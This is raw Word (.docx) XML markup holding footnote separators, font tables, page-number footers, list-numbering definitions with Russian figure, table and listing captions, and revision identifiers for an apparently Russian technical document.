      <w:footerReference w:type="default" r:id="rId31"/>
      <w:headerReference w:type="first" r:id="rId32"/>
      <w:footerReference w:type="first" r:id="rId33"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1701" w:header="567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E8265" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE1798">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D5EC3" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE1798"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A32E504" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE1798">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88A903" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE17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CJK SC">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="BookAntiqua"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6457121"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="56754965" w14:textId="706AB1C9" w:rsidR="005B556E" w:rsidRDefault="00000000" w:rsidP="00305C12">
        <w:pPr>
          <w:pStyle w:val="a7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579175"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="30E7BA86" w14:textId="77777777" w:rsidR="009A505E" w:rsidRDefault="00000000" w:rsidP="00305C12">
        <w:pPr>
          <w:pStyle w:val="a7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055D" w14:textId="1C980CD2" w:rsidR="008A54AF" w:rsidRDefault="008A54AF" w:rsidP="00305C1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6762E" w14:textId="2EE9EEC4" w:rsidR="008A54AF" w:rsidRPr="00894EA2" w:rsidRDefault="008A54AF" w:rsidP="00BD1798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94806" w14:textId="1483C739" w:rsidR="00E043A7" w:rsidRPr="004005A2" w:rsidRDefault="00E043A7" w:rsidP="004005A2">
    <w:pPr>
      <w:pStyle w:val="a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EDDCD" w14:textId="77777777" w:rsidR="00E043A7" w:rsidRPr="00894EA2" w:rsidRDefault="00E043A7" w:rsidP="00BD1798">
    <w:pPr>
      <w:pStyle w:val="a7"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">уч. №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38511" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE1798">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4493B045" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE1798">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE1A89" w14:textId="77777777" w:rsidR="00BE1798" w:rsidRDefault="00BE17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DC7CC" w14:textId="77777777" w:rsidR="005B556E" w:rsidRPr="00894EA2" w:rsidRDefault="005B556E">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>19</w:t>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr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6B736" w14:textId="77777777" w:rsidR="009A505E" w:rsidRPr="00894EA2" w:rsidRDefault="009A505E">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>19</w:t>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr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BE84C" w14:textId="77777777" w:rsidR="008A54AF" w:rsidRPr="00894EA2" w:rsidRDefault="008A54AF">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>19</w:t>
    </w:r>
    <w:r w:rsidRPr="00894EA2">
      <w:rPr>
        <w:sz w:val="28"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7DF96" w14:textId="33EB88E4" w:rsidR="00E043A7" w:rsidRPr="00894EA2" w:rsidRDefault="00E043A7" w:rsidP="00894EA2">
    <w:pPr>
      <w:pStyle w:val="a5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0C045628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067C16D6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6635"/>
        </w:tabs>
        <w:ind w:left="6635" w:hanging="397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620A7056"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1069" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05827345"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDB61CDC"/>
    <w:styleLink w:val="1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  <w:caps w:val="0"/>
        <w:smallCaps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6CF5D74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2D84E1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35C42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4306995C"/>
    <w:styleLink w:val="1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</w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Рисунок %7"/>
      <w:lvlJc w:val="center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Restart w:val="0"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Таблица %8"/>
      <w:lvlJc w:val="left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suff w:val="space"/>
      <w:lvlText w:val="Листинг %9"/>
      <w:lvlJc w:val="left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C1B17C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="023E8298"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="russianUpper"/>
      <w:pStyle w:val="11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2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1276"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Полужирный" w:hAnsi="Times New Roman Полужирный" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:position w:val="0"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="13"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1559"/>
        </w:tabs>
        <w:ind w:left="709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4"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1701"/>
        </w:tabs>
        <w:ind w:left="709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2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709" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="auto"/>
        <w:u w:val="none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709" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="auto"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="15"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Рисунок %1.%7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7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="16"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Таблица %1.%8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8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="17"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Листинг %1.%9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</w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FD628A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CEFC40C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432"/>
        </w:tabs>
        <w:ind w:left="0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432"/>
        </w:tabs>
        <w:ind w:left="0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432"/>
        </w:tabs>
        <w:ind w:left="0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15034D95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4823764"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1C1"/>
      <w:lvlText w:val="%1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decimal"/>
      <w:pStyle w:val="1C2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1418"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1C3"/>
      <w:lvlText w:val="%1.%2.%3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5B141A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E3A2A9E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="110"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="709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36"/>
        <w:szCs w:val="36"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
        <w:em w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="120"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1418"/>
        </w:tabs>
        <w:ind w:left="709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32"/>
        <w:szCs w:val="28"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
        <w:em w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="130"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1559"/>
        </w:tabs>
        <w:ind w:left="709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140"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1701"/>
        </w:tabs>
        <w:ind w:left="709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150"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1985"/>
        </w:tabs>
        <w:ind w:left="709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5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="160"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2268"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i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</w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="18"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Рисунок %1.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="19"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Таблица %1.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="1a"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Листинг %1.%9"/>
      <w:lvlJc w:val="left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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="31CF1F7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2272163"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="351C04A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647E39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0419001D"/>
    <w:styleLink w:val="1b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F65195B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9845C3A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="111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9" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="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14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E2902BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAC04FA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C558776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AA7926"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F1AC05E"/>
    <w:lvl w:ilvl="0" w:tplc="7B3A04F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1c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651119F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C210835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9130FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0DC5C9C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="112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75F637CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="358CC18A"/>
    <w:lvl w:ilvl="0" w:tplc="C75211FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a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41589158">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1708212950">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1158154895">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1416513899">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="323511221">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2032415801">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="892346173">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="744835927">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2106342719">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="283999271">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="317923835">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1571186493">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="13869052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71217166">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="4505201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40290775">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="642080769">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="13098247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239729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366828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16560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496726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322923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533520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6085268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310262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656078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460147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057846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267890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118058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769675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235408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86923280">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="58334098">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1908803627">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="44031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359331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95178496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F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1" w:alternateStyleNames="1"/>
  <w:styleLockTheme/>
  <w:styleLockQFSet/>
  <w:defaultTabStop w:val="567"/>
  <w:consecutiveHyphenLimit w:val="3"/>
  <w:hyphenationZone w:val="357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  <v:stroke weight="1pt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2B"/>
    <w:rsid w:val="000004A4"/>
    <w:rsid w:val="00000D1F"/>
    <w:rsid w:val="00001FE2"/>
    <w:rsid w:val="00002CDB"/>
    <w:rsid w:val="00005935"/>
    <w:rsid w:val="00005D1C"/>
    <w:rsid w:val="0000692A"/>
    <w:rsid w:val="00007589"/>
    <w:rsid w:val="000101A0"/>
    <w:rsid w:val="00014937"/>
    <w:rsid w:val="000156FF"/>
    <w:rsid w:val="00017891"/>
    <w:rsid w:val="00017D37"/>
    <w:rsid w:val="00017E19"/>
    <w:rsid w:val="0002241F"/>
    <w:rsid w:val="00024640"/>
    <w:rsid w:val="00030676"/>
    <w:rsid w:val="00031A79"/>
    <w:rsid w:val="0003423E"/>
    <w:rsid w:val="0003693B"/>
    <w:rsid w:val="000414A5"/>
    <w:rsid w:val="00042016"/>
    <w:rsid w:val="00042897"/>
    <w:rsid w:val="00044A29"/>
    <w:rsid w:val="00045C54"/>
    <w:rsid w:val="0004646D"/>
    <w:rsid w:val="00047514"/>
    <w:rsid w:val="000509E9"/>
    <w:rsid w:val="000534E5"/>
    <w:rsid w:val="00061E0D"/>
    <w:rsid w:val="00061EFC"/>
    <w:rsid w:val="0006339C"/>
    <w:rsid w:val="000642E7"/>
    <w:rsid w:val="0006497D"/>
    <w:rsid w:val="00065F58"/>
    <w:rsid w:val="00071FC9"/>
    <w:rsid w:val="00073ABE"/>
    <w:rsid w:val="00073CBC"/>
    <w:rsid w:val="00076EE8"/>
    <w:rsid w:val="0008044D"/>
    <w:rsid w:val="00080DC9"/>
    <w:rsid w:val="000812DC"/>
    <w:rsid w:val="000848BE"/>
    <w:rsid w:val="00085CCB"/>
    <w:rsid w:val="00087F8B"/>
    <w:rsid w:val="00091890"/>
    <w:rsid w:val="00092112"/>
    <w:rsid w:val="00093DF2"/>
    <w:rsid w:val="00094996"/>
    <w:rsid w:val="000968DA"/>
    <w:rsid w:val="00097666"/>
    <w:rsid w:val="00097EB8"/>
    <w:rsid w:val="000A1114"/>
    <w:rsid w:val="000A2356"/>
    <w:rsid w:val="000A5CE4"/>
    <w:rsid w:val="000A6173"/>
    <w:rsid w:val="000A7321"/>
    <w:rsid w:val="000B01A9"/>
    <w:rsid w:val="000B04EC"/>
    <w:rsid w:val="000B1292"/>
    <w:rsid w:val="000B196F"/>
    <w:rsid w:val="000B29DA"/>
    <w:rsid w:val="000B2B8E"/>
    <w:rsid w:val="000B7B79"/>
    <w:rsid w:val="000B7BA9"/>
    <w:rsid w:val="000C00E3"/>
    <w:rsid w:val="000C0670"/>
    <w:rsid w:val="000C3EBC"/>
    <w:rsid w:val="000D676A"/>
    <w:rsid w:val="000D7D38"/>
    <w:rsid w:val="000D7E4C"/>
    <w:rsid w:val="000E14BD"/>
    <w:rsid w:val="000E38EC"/>
    <w:rsid w:val="000E4786"/>
    <w:rsid w:val="000E546F"/>
    <w:rsid w:val="000F0D2D"/>
    <w:rsid w:val="000F1C53"/>
    <w:rsid w:val="000F2390"/>
    <w:rsid w:val="000F2602"/>
    <w:rsid w:val="000F2FA4"/>
    <w:rsid w:val="000F4B76"/>
    <w:rsid w:val="000F4C3B"/>
    <w:rsid w:val="000F5034"/>
    <w:rsid w:val="000F60B9"/>
    <w:rsid w:val="000F7006"/>
    <w:rsid w:val="000F7367"/>
    <w:rsid w:val="00100C71"/>
    <w:rsid w:val="00101035"/>
    <w:rsid w:val="00101DE6"/>
    <w:rsid w:val="00103E7C"/>
    <w:rsid w:val="00104855"/>
    <w:rsid w:val="001057BD"/>
    <w:rsid w:val="00105F5D"/>
    <w:rsid w:val="00106381"/>
    <w:rsid w:val="001074BB"/>
    <w:rsid w:val="001135B5"/>
    <w:rsid w:val="001141B6"/>
    <w:rsid w:val="00114982"/>
    <w:rsid w:val="00115DCE"/>
    <w:rsid w:val="001211A6"/>
    <w:rsid w:val="00122399"/>
    <w:rsid w:val="001233AB"/>
    <w:rsid w:val="00124379"/>
    <w:rsid w:val="0012665A"/>
    <w:rsid w:val="00127053"/>
    <w:rsid w:val="00127AD1"/>
    <w:rsid w:val="00130005"/>
    <w:rsid w:val="0013097B"/>
    <w:rsid w:val="0013130E"/>
    <w:rsid w:val="00132DF3"/>
    <w:rsid w:val="00132FA3"/>
    <w:rsid w:val="00133ECF"/>
    <w:rsid w:val="001358FC"/>
    <w:rsid w:val="001367FE"/>
    <w:rsid w:val="001438AD"/>
    <w:rsid w:val="00144C14"/>
    <w:rsid w:val="001503A3"/>
    <w:rsid w:val="0015049D"/>
    <w:rsid w:val="00153AEA"/>
    <w:rsid w:val="00154707"/>
    <w:rsid w:val="001708F5"/>
    <w:rsid w:val="00170972"/>
    <w:rsid w:val="00171CD5"/>
    <w:rsid w:val="00171E3D"/>
    <w:rsid w:val="00174D86"/>
    <w:rsid w:val="00175E77"/>
    <w:rsid w:val="001776B1"/>
    <w:rsid w:val="00180182"/>
    <w:rsid w:val="001806C3"/>
    <w:rsid w:val="00182ABB"/>
    <w:rsid w:val="00182FD3"/>
    <w:rsid w:val="00184D9E"/>
    <w:rsid w:val="00185102"/>
    <w:rsid w:val="00185DBA"/>
    <w:rsid w:val="00190EB2"/>
    <w:rsid w:val="001911AD"/>
    <w:rsid w:val="00195385"/>
    <w:rsid w:val="00196134"/>
    <w:rsid w:val="001961D3"/>
    <w:rsid w:val="001979B9"/>
    <w:rsid w:val="00197EAA"/>
    <w:rsid w:val="001A06E7"/>
    <w:rsid w:val="001A228B"/>
    <w:rsid w:val="001A4695"/>
    <w:rsid w:val="001A4E4B"/>
    <w:rsid w:val="001A588A"/>
    <w:rsid w:val="001A77B0"/>
    <w:rsid w:val="001B3D1F"/>
    <w:rsid w:val="001B47E3"/>
    <w:rsid w:val="001B542E"/>
    <w:rsid w:val="001B72EA"/>
    <w:rsid w:val="001B7E9E"/>
    <w:rsid w:val="001C352A"/>
    <w:rsid w:val="001C38E2"/>
    <w:rsid w:val="001C5926"/>
    <w:rsid w:val="001D2932"/>
    <w:rsid w:val="001D3059"/>
    <w:rsid w:val="001D4985"/>
    <w:rsid w:val="001D4CAD"/>
    <w:rsid w:val="001D5D71"/>
    <w:rsid w:val="001D7372"/>
    <w:rsid w:val="001D796B"/>
    <w:rsid w:val="001E0634"/>
    <w:rsid w:val="001E10ED"/>
    <w:rsid w:val="001E202C"/>
    <w:rsid w:val="001E2342"/>
    <w:rsid w:val="001E3286"/>
    <w:rsid w:val="001E37B1"/>
    <w:rsid w:val="001E430D"/>
    <w:rsid w:val="001E69FF"/>
    <w:rsid w:val="001E7048"/>
    <w:rsid w:val="001F04CB"/>
    <w:rsid w:val="001F281C"/>
    <w:rsid w:val="001F520B"/>
    <w:rsid w:val="001F6782"/>
    <w:rsid w:val="00201C2C"/>
    <w:rsid w:val="00201C94"/>
    <w:rsid w:val="002028E0"/>
    <w:rsid w:val="00202A1D"/>
    <w:rsid w:val="0020396D"/>
    <w:rsid w:val="00203E75"/>
    <w:rsid w:val="00207634"/>
    <w:rsid w:val="002077EE"/>
    <w:rsid w:val="00207860"/>
    <w:rsid w:val="00207AE4"/>
    <w:rsid w:val="00207FF7"/>
    <w:rsid w:val="00210DD2"/>
    <w:rsid w:val="00212ADE"/>
    <w:rsid w:val="002139DF"/>
    <w:rsid w:val="00213F7F"/>
    <w:rsid w:val="00214B54"/>
    <w:rsid w:val="00215736"/>
    <w:rsid w:val="00216A57"/>
    <w:rsid w:val="00221087"/>
    <w:rsid w:val="00222B3E"/>
    <w:rsid w:val="0022516F"/>
    <w:rsid w:val="002276A2"/>
    <w:rsid w:val="00233390"/>
    <w:rsid w:val="002361DE"/>
    <w:rsid w:val="0023623F"/>
    <w:rsid w:val="00237684"/>
    <w:rsid w:val="002402A8"/>
    <w:rsid w:val="002453E4"/>
    <w:rsid w:val="00246039"/>
    <w:rsid w:val="002471F7"/>
    <w:rsid w:val="00250554"/>
    <w:rsid w:val="00252E1E"/>
    <w:rsid w:val="00260244"/>
    <w:rsid w:val="0026030E"/>
    <w:rsid w:val="002603EA"/>
    <w:rsid w:val="002629DE"/>
    <w:rsid w:val="00264109"/>
    <w:rsid w:val="002645F9"/>
    <w:rsid w:val="00266636"/>
    <w:rsid w:val="00267D35"/>
    <w:rsid w:val="00272373"/>
    <w:rsid w:val="00274662"/>
    <w:rsid w:val="00275538"/>
    <w:rsid w:val="00280085"/>
    <w:rsid w:val="0028118A"/>
    <w:rsid w:val="00281DA1"/>
    <w:rsid w:val="00282811"/>
    <w:rsid w:val="00282A3D"/>
    <w:rsid w:val="00284908"/>
    <w:rsid w:val="002862B2"/>
    <w:rsid w:val="00287A86"/>
    <w:rsid w:val="00287F6D"/>
    <w:rsid w:val="00290E74"/>
    <w:rsid w:val="002949CC"/>
    <w:rsid w:val="002A0F05"/>
    <w:rsid w:val="002A1B45"/>
    <w:rsid w:val="002A339C"/>
    <w:rsid w:val="002A3825"/>
    <w:rsid w:val="002A383D"/>
    <w:rsid w:val="002A39D5"/>
    <w:rsid w:val="002A3DAF"/>
    <w:rsid w:val="002A4121"/>
    <w:rsid w:val="002A57ED"/>
    <w:rsid w:val="002A6966"/>
    <w:rsid w:val="002A6DC6"/>
    <w:rsid w:val="002B0DAC"/>
    <w:rsid w:val="002B169C"/>
    <w:rsid w:val="002B308E"/>
    <w:rsid w:val="002B3552"/>
    <w:rsid w:val="002B485C"/>
    <w:rsid w:val="002B58DF"/>
    <w:rsid w:val="002B7007"/>
    <w:rsid w:val="002B7B5E"/>
    <w:rsid w:val="002C31BE"/>
    <w:rsid w:val="002C4CF3"/>
    <w:rsid w:val="002C5414"/>
    <w:rsid w:val="002C5A1E"/>
    <w:rsid w:val="002C7F46"/>
    <w:rsid w:val="002D018A"/>
    <w:rsid w:val="002D3CBF"/>
